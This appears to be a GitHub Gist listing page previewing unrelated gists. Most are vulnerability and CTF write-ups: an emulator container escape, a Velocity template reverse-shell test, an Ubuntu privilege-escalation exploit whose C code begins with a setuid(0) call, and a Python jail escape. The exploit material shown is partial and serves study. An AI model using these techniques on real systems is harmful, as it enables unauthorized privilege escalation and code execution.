@aglab2
aglab2 / a.md
Last active May 29, 2024 00:43
Project 64 1.6 container escape vulnerability writeup

The vulnerable emulator is Project 64 1.6.x/1.7. Two vulnerabilities can be used to gain arbitrary code execution from the emulation container from an N64 ROM.

  1. Container escape and arbitrary writes from N64 ROM outside of designated N64 RAM

The vulnerable function is Compile_R4300i_SB, along with its friends Compile_R4300i_S*: https://github.com/zeromus/pj64/blob/master/RecompilerOps.cpp#L1955C6-L2024

If a non-const Opcode.base is used to avoid the condition at lines 1961-1971, which does the checks properly, we can load from a volatile address addr (compiled to MIPS asm inside the ROM):

@mechaneyes
mechaneyes / intro.md
Created January 26, 2024 00:34
AI Art Generation
@Siss3l
Siss3l / sealed.md
Last active April 28, 2024 22:12
Sealed Note - 1337UP Capture The Flag 2023 (thanks to @aszx87410)

Sealed Note

  • Category: Web
  • Alone: (0 solve)

Challenge

Description

We have access to a web challenge allowing us to create, read and send notes to a Puppeteer bot:

@win3zz
win3zz / VelocityReverseShell.md
Created November 12, 2023 06:43
Velocity Template Language (VTL) - Remote Command Execution - Reverse Shell - SSTI - Testing

Download Dependencies

user@hostname:~$ mkdir velocity-engine
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-core-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-scripting-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/spring-velocity-support-2.3.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/slf4j/slf4j-api/2.0.9/slf4j-api-2.0.9.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.13.0/commons-lang3-3.13.0.jar
user@hostname:~/velocity-engine$ cd ..
user@hostname:~$
@win3zz
win3zz / GameOver(lay).md
Last active February 22, 2024 11:50
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {

Hack.lu CTF 2023 - Safest Eval (Python jail escape)

Challenge by: realansgar
Writeup by: rebane2001

Overview

The challenge consists of a simple Flask webapp that lets you eval arbitrary Python code in a jail in order to evaluate your solution to a leetcode-style programming challenge. The flag can be retrieved by running the /readflag setuid program. The source code was provided.

Flash challenge website

@ljnmedium
ljnmedium / model_inforetrieval.py
Created September 29, 2023 07:39
model_inforetrieval.py
chatdoc = ChatDoc(model_name= OPENAI_MODEL)
chatdoc.connect_openai_api()
questions = QUESTIONS_COMMITTE_AUDIT
retriever.retreive_with_query( query, top_k=1, namespace='Eiffage')
contexts = loader_document.retreive_contents_from_ids(ids)
respone = chatdoc.prompt_with_context(query, contexts= list(contexts.values()), verbose=True)
print(query,'\n', respone, '\n')
@simonw
simonw / README.md
Created September 10, 2023 17:15
SQLite micro-benchmark with Python threading

I got GPT-4 Code Interpreter to write most of this for me, transcript here

I had to modify it a tiny bit to get it to run, the parameters for the queries were missing.

Results on my M2 MacBook Pro:

---------------
Mode | Scenario | Update QPS | Select QPS
---------------
@Siss3l
Siss3l / 0723.md
Last active July 26, 2023 00:02
Intigriti's July 2023 Web challenge thanks to @kavishkagihan

Intigriti July Challenge

  • Category: Web
  • Impact: Medium
  • Solves: 35

Challenge

Description

@arkark
arkark / README.md
Last active July 26, 2023 07:44
Google CTF 2023 - web/Biohazard